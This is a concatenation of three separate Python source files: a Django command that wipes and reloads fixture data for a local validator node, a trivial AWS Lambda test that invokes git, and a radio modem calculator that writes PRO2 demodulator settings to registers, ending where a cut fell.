import os from django.contrib.auth import get_user_model from django.core import management from django.core.management.base import BaseCommand from django.core.management.commands import loaddata from django.core.validators import validate_ipv46_address from config.helpers.environment import ENVIRONMENT from v1.accounts.models.account import Account from v1.banks.models.bank import Bank from v1.cache_tools.helpers import rebuild_cache from v1.self_configurations.helpers.self_configuration import get_self_configuration from v1.self_configurations.models.self_configuration import SelfConfiguration from v1.validators.models.validator import Validator """ python3 manage.py initialize_test_confirmation_validator -ip [IP ADDRESS] Running this script will: - delete all Accounts, Banks, SelfConfigurations, Users, and Validators - load in fixture data (same models as above) - rebuild cache Fixture data sets self as the confirmation validator. Default superuser is: username: bucky password: <PASSWORD> """ CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) FIXTURES_DIR = os.path.join(CURRENT_DIR, 'confirmation_validator_fixtures') User = get_user_model() class Command(BaseCommand): help = 'Delete existing data, load in fixture data, set self as confirmation validator, rebuild cache' # noqa: A003 def add_arguments(self, parser): """ Required arguments: -ip_address - Public IP address """ parser.add_argument('-ip', help='Public IP address', required=True) def handle(self, *args, **options): """Run script""" valid_environments = ['local', 'postgres_local'] if ENVIRONMENT not in valid_environments: raise RuntimeError(f'DJANGO_APPLICATION_ENVIRONMENT must be in {valid_environments}') ip = options['ip'] validate_ipv46_address(ip) self.install_fixture_data() self_configuration = get_self_configuration(exception_class=RuntimeError) SelfConfiguration.objects.filter(pk=self_configuration.id).update(ip_address=ip) rebuild_cache(head_block_hash=self_configuration.root_account_file_hash) self.stdout.write(self.style.SUCCESS('Validator initialization complete')) def install_fixture_data(self): """ Delete all Accounts, Banks, SelfConfigurations, Users, and Validators Load in fixture data (same models as above) """ global FIXTURES_DIR self.stdout.write(self.style.SUCCESS('Installing fixture data...')) Account.objects.all().delete() Bank.objects.all().delete() SelfConfiguration.objects.all().delete() User.objects.all().delete() Validator.objects.all().delete() fixture_files = [ 'validator.json', 'account.json', 'bank.json', 'self_configuration.json', 'user.json' ] for fixture_file in fixture_files: fixtures = os.path.join(FIXTURES_DIR, fixture_file) management.call_command(loaddata.Command(), fixtures, verbosity=1) self.stdout.write(self.style.SUCCESS('Fixture data installed successfully'))
11589484
import subprocess def lambda_handler(event, context): subprocess.run(['git']) return 'test passed'
11589493
from pro2_chip_configurator.src.si4440_modem_calc.pro2_ocelotmodemcalc import Pro2OcelotModemCalc from pro2_chip_configurator.src.si4440_modem_calc.pro2_ocelotmodemcalcinputs import Pro2OcelotModemCalcInputs from pyradioconfig.calculator_model_framework.interfaces.icalculator import ICalculator from collections import OrderedDict from pycalcmodel.core.variable import ModelVariableFormat, CreateModelVariableEnum from pro2_chip_configurator.src.si4440_modem_calc.decode_api import en4gfsk,enook from pyradioconfig.calculator_model_framework.Utils.CustomExceptions import CalculationException class CALC_Pro2_Demod_Ocelot(ICalculator): def buildVariables(self,model): self._addModelVariable(model, 'pro2_osr_tune', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_pm_pattern', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_modulation_type', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_afc_mode', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_ant_div', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_dsa_mode', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_fs_rx_ch', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_afc_gain', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_ksi3', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_phscale', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_bw_peak', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_baudrate', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_manchester', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_deviation', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'freq_dev_max', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'freq_dev_min', int, ModelVariableFormat.DECIMAL) def calc_run_pro2(self,model): # This method calls the pro2 calculator # Load model values into local variables modem_frequency_hz = model.vars.modem_frequency_hz.value rx_xtal_error_ppm = model.vars.rx_xtal_error_ppm.value tx_xtal_error_ppm = model.vars.tx_xtal_error_ppm.value bandwidth_hz = model.vars.bandwidth_hz.value base_frequency_hz = model.vars.base_frequency_hz.value test_ber = model.vars.test_ber.value pro2_osr_tune = model.vars.pro2_osr_tune.value pro2_pm_pattern = model.vars.pro2_pm_pattern.value symbol_encoding = model.vars.symbol_encoding.value pro2_modulation_type = model.vars.pro2_modulation_type.value baudrate_tol_req_ppm = model.vars.baudrate_tol_ppm.value deviation = model.vars.deviation.value pro2_afc_mode = model.vars.pro2_afc_mode.value pro2_ant_div = model.vars.pro2_ant_div.value pro2_dsa_mode = model.vars.pro2_dsa_mode.value digmix_res = model.vars.digmix_res_actual.value pro2_fs_rx_ch = model.vars.pro2_fs_rx_ch.value baudrate = model.vars.baudrate.value bcr_demod_en = model.vars.bcr_demod_en.value bcr_detector_en = model.vars.MODEM_PHDMODCTRL_BCRDETECTOR.value #Only run the PRO2 calculator if the BCR demod is enabled if bcr_demod_en or bcr_detector_en == 1: #Create the input dict fdeverror = model.vars.deviation_tol_ppm.value pro2_inputs = OrderedDict({}) pro2_inputs["API_freq_xo"] = modem_frequency_hz pro2_inputs["API_crystal_tol"] = (rx_xtal_error_ppm + tx_xtal_error_ppm)/2.0 pro2_inputs["API_if_mode"] = 2 #Fixed IF = 468.75kHz pro2_inputs["API_High_perf_Ch_Fil"] = 1 #High performance channel filter enabled, don't care since we aren't using this IP pro2_inputs["API_OSRtune"] = pro2_osr_tune pro2_inputs["API_Ch_Fil_Bw_AFC"] = 0 #Disable channel filter switch after AFC, we are not using this channel filter IP pro2_inputs["API_ant_div"] = pro2_ant_div pro2_inputs["API_pm_pattern"] = pro2_pm_pattern pro2_inputs["API_modulation_type"] = pro2_modulation_type pro2_inputs["API_Rsymb"] = baudrate pro2_inputs["API_Fdev"] = deviation pro2_inputs["API_RXBW"] = bandwidth_hz pro2_inputs["API_Manchester"] = (symbol_encoding == model.vars.symbol_encoding.var_enum.Manchester or \ symbol_encoding == model.vars.symbol_encoding.var_enum.Inv_Manchester) pro2_inputs["API_afc_en"] = pro2_afc_mode pro2_inputs["API_Max_Rb_Error"] = baudrate_tol_req_ppm / (1e6) pro2_inputs["API_Chip_Version"] = 2 #Assume Rev B PRO2 with VCO 3.4GHz to 4.2GHz pro2_inputs["API_fc"] = base_frequency_hz pro2_inputs["API_TC"] = 28 #Default ramp time, don't care pro2_inputs["API_fhst"] = 2000 pro2_inputs["API_inputBW"] = 1 #Specify FSK RX BW explicitly pro2_inputs["API_BER_mode"] = test_ber pro2_inputs["API_raw_demod"] = 0 #TODO: Need to implement this later pro2_inputs["API_dsource"] = 0 #Don't care, this is for direct mode TX pro2_inputs["API_hi_pfm_div_mode"] = 1 #Always set to 1 for PRO2 pro2_inputs["API_dsa_mode"] = pro2_dsa_mode pro2_inputs["API_dsm_ratio"] = 1 pro2_inputs["API_Fs_rx_CH"] = pro2_fs_rx_ch pro2_inputs["API_fb_frequency_resolution"] = digmix_res pro2_inputs["API_modulation_index"] = model.vars.modulation_index_actual.value pro2_inputs["Fdev_error"] = fdeverror / 1e6 pro2_inputs["API_pm_len"] = model.vars.preamble_detection_length.value # overwrite BCR demod setting in concurrent mode which is set by forcing bcr_demod_en at input if (model.vars.bcr_demod_en._value_forced != None): pro2_inputs["API_Rsymb"] = model.vars.bcr_conc_baudrate.value pro2_inputs["API_Manchester"] = model.vars.bcr_conc_manchester.value pro2_inputs["API_Fdev"] = model.vars.bcr_conc_deviation.value #Instantiate an object for pro2 inputs and initialize with the input values defined above pro2_input_obj = Pro2OcelotModemCalcInputs(pro2_inputs) #Instantiate the pro2 calculator and initialize with our input object pro2_calculator_obj = Pro2OcelotModemCalc(pro2_input_obj) #Run the pro2 calculator pro2_calculator_obj.calculate() #Assign the pro2 output values to registers / variables self._map_pro2_dsa_outputs(model, pro2_calculator_obj) if bcr_detector_en == 1: self.write_unused_bcr_regs(model) else: self._map_pro2_outputs(model, pro2_calculator_obj) else: #Write default values to the BCR demod regs self.write_unused_pro2_dsa_regs(model) self.write_unused_bcr_regs(model) def _map_pro2_dsa_outputs(self, model, pro2_calculator_obj): antdivmode = model.vars.antdivmode.value # : check phspike_det_thd = pro2_calculator_obj.demodulator.fields.spike_det_thd # : If antenna diversity is enabled, scale up the detection threshold scale = 1.5 # TODO REVERT 1.5 if antdivmode != model.vars.antdivmode.var_enum.DISABLE: phspike_det_thd = scale * phspike_det_thd #Always set ENCFEQUAL to 0 for OOK, otherwise use signal_dsa_mode self._reg_write(model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL, pro2_calculator_obj.demodulator.fields.signal_dsa_mode if pro2_calculator_obj.inputs.API_modulation_type != 1 else 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETEN, pro2_calculator_obj.demodulator.fields.signal_dsa_mode) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_NONSTDPK, pro2_calculator_obj.demodulator.fields.nonstdpk_final) self._reg_write(model.vars.MODEM_BCRDEMODARR0_PHSPIKETHD, int(phspike_det_thd)) def write_unused_pro2_dsa_regs(self, model): self._reg_write(model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_NONSTDPK, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_PHSPIKETHD, 0) def _map_pro2_outputs(self,model, pro2_calculator_obj): #This function maps the pro2 calculator outputs to radio configurator variables / outputs # Write BCRDEMODCTRL self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWSYN, pro2_calculator_obj.demodulator.fields.raw_syn) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PH0SIZE, pro2_calculator_obj.demodulator.fields.ph0size) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_LOCKUPBYP, pro2_calculator_obj.demodulator.fields.res_lockup_byp) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFASTMA, pro2_calculator_obj.demodulator.fields.fast_ma) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SPIKEREMOV, pro2_calculator_obj.demodulator.fields.spike_rm_en) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFLTSEL, pro2_calculator_obj.demodulator.fields.rawflt_sel) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PREATH, pro2_calculator_obj.demodulator.fields.preath) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SKIPSYN, pro2_calculator_obj.demodulator.fields.skipsyn) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PMPATTERN, pro2_calculator_obj.demodulator.fields.pm_pattern) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SLICERFAST, pro2_calculator_obj.demodulator.fields.slicer_fast) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_DETECTORSEL, pro2_calculator_obj.demodulator.fields.detector) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PHSRCSEL, pro2_calculator_obj.demodulator.fields.ph_scr_sel) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_CONSCHKBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PULCORRBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHDLY, 0) # Write BCRDEMODOOK self._reg_write(model.vars.MODEM_BCRDEMODOOK_OOKFRZEN, pro2_calculator_obj.demodulator.fields.ookfrz_en) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWGAIN, int(pro2_calculator_obj.demodulator.fields.rawgain)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_MAFREQDWN, pro2_calculator_obj.demodulator.fields.ma_freqdwn) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCLKEN, pro2_calculator_obj.demodulator.fields.squelch_clk_en) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BWPK, model.vars.calculated_bw_peak.value) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAYSWAL, pro2_calculator_obj.demodulator.fields.decay_swal) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAY, int(pro2_calculator_obj.demodulator.fields.Decay)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ATTACK, pro2_calculator_obj.demodulator.fields.Attack) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCH, pro2_calculator_obj.demodulator.fields.arr_squelch) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWNDEC, int(pro2_calculator_obj.demodulator.fields.ndec0)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BCRDEMODOOK,int(enook(pro2_calculator_obj.inputs.API_modulation_type))) self._reg_write(model.vars.MODEM_BCRDEMODOOK_PKTRUNK, 0) #Write BCRCTRL0 self._reg_write(model.vars.MODEM_BCRCTRL0_BCRNCOFF, int(pro2_calculator_obj.demodulator.fields.ncoff)) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRALIGN, pro2_calculator_obj.demodulator.fields.bcr_align_en) self._reg_write(model.vars.MODEM_BCRCTRL0_DISTOGG, pro2_calculator_obj.demodulator.fields.distogg) self._reg_write(model.vars.MODEM_BCRCTRL0_CRSLOW, pro2_calculator_obj.demodulator.fields.crslow) self._reg_write(model.vars.MODEM_BCRCTRL0_CRFAST, pro2_calculator_obj.demodulator.fields.crfast) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRERRRSTEN, 1) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRFBBYP, pro2_calculator_obj.demodulator.fields.bcrfbbyp) #Write BCRCTRL1 self._reg_write(model.vars.MODEM_BCRCTRL1_CRGAIN, int(pro2_calculator_obj.demodulator.fields.CR_gain)) self._reg_write(model.vars.MODEM_BCRCTRL1_CGAINX2, pro2_calculator_obj.demodulator.fields.crgainx2) self._reg_write(model.vars.MODEM_BCRCTRL1_RXNCOCOMP, pro2_calculator_obj.demodulator.fields.rxncocomp) self._reg_write(model.vars.MODEM_BCRCTRL1_RXCOMPLAT, pro2_calculator_obj.demodulator.fields.rxcomp_lat) self._reg_write(model.vars.MODEM_BCRCTRL1_ESCMIDPT, pro2_calculator_obj.demodulator.fields.esc_midpt) self._reg_write(model.vars.MODEM_BCRCTRL1_DISMIDPT, pro2_calculator_obj.demodulator.fields.dis_midpt) self._reg_write(model.vars.MODEM_BCRCTRL1_BCROSR, int(pro2_calculator_obj.demodulator.fields.OSR_rx_BCR)) self._reg_write(model.vars.MODEM_BCRCTRL1_ESTOSREN, pro2_calculator_obj.demodulator.fields.est_osr_en) self._reg_write(model.vars.MODEM_BCRCTRL1_BCRSWSYCW, pro2_calculator_obj.demodulator.fields.bcr_sw_sycw) self._reg_write(model.vars.MODEM_BCRCTRL1_PHCOMP2FSK, pro2_calculator_obj.demodulator.kphcomp_2fsk) self._reg_write(model.vars.MODEM_BCRCTRL1_SLICEFBBYP, pro2_calculator_obj.demodulator.fields.slicefbbyp) #Write BCRDEMODAFC0 self._reg_write(model.vars.MODEM_BCRDEMODAFC0_LARGEFREQERR, int(pro2_calculator_obj.demodulator.fields.large_freq_err)) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_AFCGAINOVRFLW, pro2_calculator_obj.demodulator.fields.afcgain_ovr_flw) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_EN2TBEST, pro2_calculator_obj.demodulator.fields.en2Tb_est) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_ENAFCCLKSW, pro2_calculator_obj.demodulator.fields.enafc_clksw) #Write BCRDEMODAFC1 self._reg_write(model.vars.MODEM_BCRDEMODAFC1_LGWAIT, pro2_calculator_obj.demodulator.fields.afc_lgwait) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SHWAIT, pro2_calculator_obj.demodulator.fields.afc_shwait) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_GEARSW, pro2_calculator_obj.demodulator.fields.gear_sw) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_AFCMAEN, pro2_calculator_obj.demodulator.fields.afcma_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFZPMEND, pro2_calculator_obj.demodulator.fields.enfzpmend) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_NONFRZEN, pro2_calculator_obj.demodulator.fields.non_frzen) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTWAITCNT, pro2_calculator_obj.demodulator.fields.oneshot_waitcnt) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTAFCEN,pro2_calculator_obj.demodulator.fields.oneshot_afc) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SKIPPMDET, pro2_calculator_obj.demodulator.fields.skip_pm_det) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFCFRZ, pro2_calculator_obj.demodulator.fields.afc_freez_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFC, pro2_calculator_obj.demodulator.fields.afc_est_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFBPLL, int(pro2_calculator_obj.demodulator.fields.afc_fb_pll)) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_HALFPHCOMP, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_PMRSTEN, 0) #Write BCRDEMOD4FSK0 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_THD4GFSK, int(pro2_calculator_obj.demodulator.fields.thd4gfsk)) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_CODE4GFSK, pro2_calculator_obj.demodulator.fields.code4gfsk) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_PHCOMPBYP, pro2_calculator_obj.demodulator.fields.phcompbyp) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_EN4GFSK, int(en4gfsk(pro2_calculator_obj.inputs.API_modulation_type))) #Write BCRDEMOD4FSK1 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK0, pro2_calculator_obj.demodulator.fields.phcomp_gain_4gfsk0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK1, pro2_calculator_obj.demodulator.fields.phcomp_gain_4gfsk1 & 0x7f) #Remove bit 7 which was used in Pro2 for a different purpose self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_S2PMAP, pro2_calculator_obj.demodulator.fields.s2p_map) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPEN, pro2_calculator_obj.demodulator.fields.thd4gfsk_comp_en) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPRATIO, pro2_calculator_obj.demodulator.fields.thd4gfsk_comp_ratio) #Write BCRDEMODANT self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PHTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANWAIT, pro2_calculator_obj.demodulator.fields.anwait) self._reg_write(model.vars.MODEM_BCRDEMODANT_AGCGAINUPB, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PH, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BYP1P5, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANT2PMTHD, pro2_calculator_obj.demodulator.fields.ant2pm_thd) self._reg_write(model.vars.MODEM_BCRDEMODANT_SWANTTIMER, 1) self._reg_write(model.vars.MODEM_BCRDEMODANT_BCRDEMODANTDIV, pro2_calculator_obj.demodulator.fields.antdiv) #Write BCRDEMODRSSI self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIARRTHD, pro2_calculator_obj.demodulator.fields.rssi_arr_thd) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_MUTERSSICNT, pro2_calculator_obj.demodulator.fields.mute_rssi_cnt) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIMATAP, pro2_calculator_obj.demodulator.fields.matap) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_PRWOFFSET, 0) #Write BCRDEMODARR0 self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDLO, pro2_calculator_obj.demodulator.fields.schprd_low) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDHI, pro2_calculator_obj.demodulator.fields.schprd_h) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRRSTEN, pro2_calculator_obj.demodulator.fields.arr_rst_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRTOLER, pro2_calculator_obj.demodulator.fields.arr_toler) self._reg_write(model.vars.MODEM_BCRDEMODARR0_DIFF0RSTEN, pro2_calculator_obj.demodulator.fields.diff0rst_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETTHD, pro2_calculator_obj.demodulator.fields.arrival_thd) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHFRZEN, pro2_calculator_obj.demodulator.fields.sch_frzen) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTEN, pro2_calculator_obj.demodulator.fields.eyexest_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTFAST, pro2_calculator_obj.demodulator.fields.eyexest_fast) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETSRC, pro2_calculator_obj.demodulator.fields.arriving_src) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEQUALEN, 0) # Write BCRDEMODARR1 self._reg_write(model.vars.MODEM_BCRDEMODARR1_ARREYEQUAL, int(pro2_calculator_obj.demodulator.fields.arr_eye_qual)) self._reg_write(model.vars.MODEM_BCRDEMODARR1_BCRCFESRC, 1) self._reg_write(model.vars.MODEM_BCRDEMODARR1_KSICOMPEN, 0) # Write BCRDEMODARR2 self._reg_write(model.vars.MODEM_BCRDEMODARR2_RAWDCHKALWAYON, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR2_CONSYMOL, 0) # Write BCRDEMODKSI self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI1, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI2, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI3, model.vars.calculated_ksi3.value ) # Write BCRDEMODPMEXP self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPHSCALE , model.vars.calculated_phscale.value) self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMEXP , 21845) # GET afc gain result digmix_res = model.vars.digmix_res_actual.value model.vars.pro2_afc_gain.value = int(digmix_res * pro2_calculator_obj.demodulator.fields.afc_gain) def write_unused_bcr_regs(self,model): # Write BCRDEMODCTRL self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWSYN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PH0SIZE, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_LOCKUPBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFASTMA, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SPIKEREMOV, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFLTSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PREATH, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SKIPSYN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PMPATTERN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SLICERFAST, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_DETECTORSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PHSRCSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_CONSCHKBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PULCORRBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHDLY, 0) # Write BCRDEMODOOK self._reg_write(model.vars.MODEM_BCRDEMODOOK_OOKFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWGAIN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_MAFREQDWN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCLKEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BWPK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAYSWAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAY, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ATTACK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCH, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWNDEC, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BCRDEMODOOK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_PKTRUNK, 0) # Write BCRCTRL0 self._reg_write(model.vars.MODEM_BCRCTRL0_BCRNCOFF, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRALIGN, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_DISTOGG, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_CRSLOW, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_CRFAST, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRERRRSTEN, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRFBBYP, 0) # Write BCRCTRL1 self._reg_write(model.vars.MODEM_BCRCTRL1_CRGAIN, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_CGAINX2, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_RXNCOCOMP, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_RXCOMPLAT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_ESCMIDPT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_DISMIDPT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_BCROSR, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_ESTOSREN, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_BCRSWSYCW, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_PHCOMP2FSK, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_SLICEFBBYP, 0) # Write BCRDEMODAFC0 self._reg_write(model.vars.MODEM_BCRDEMODAFC0_LARGEFREQERR, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_AFCGAINOVRFLW, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_EN2TBEST, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_ENAFCCLKSW, 0) # Write BCRDEMODAFC1 self._reg_write(model.vars.MODEM_BCRDEMODAFC1_LGWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SHWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_GEARSW, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_AFCMAEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFZPMEND, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_NONFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTWAITCNT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTAFCEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SKIPPMDET, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFCFRZ, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFC, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFBPLL, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_HALFPHCOMP, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_PMRSTEN, 0) # Write BCRDEMOD4FSK0 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_THD4GFSK, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_CODE4GFSK, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_PHCOMPBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_EN4GFSK, 0) # Write BCRDEMOD4FSK1 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK0, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK1, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_S2PMAP, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPEN, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPRATIO, 0) # Write BCRDEMODANT self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PHTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_AGCGAINUPB, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PH, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BYP1P5, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANT2PMTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SWANTTIMER, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BCRDEMODANTDIV, 0) # Write BCRDEMODRSSI self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIARRTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_MUTERSSICNT, 0) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_PRWOFFSET, 0) 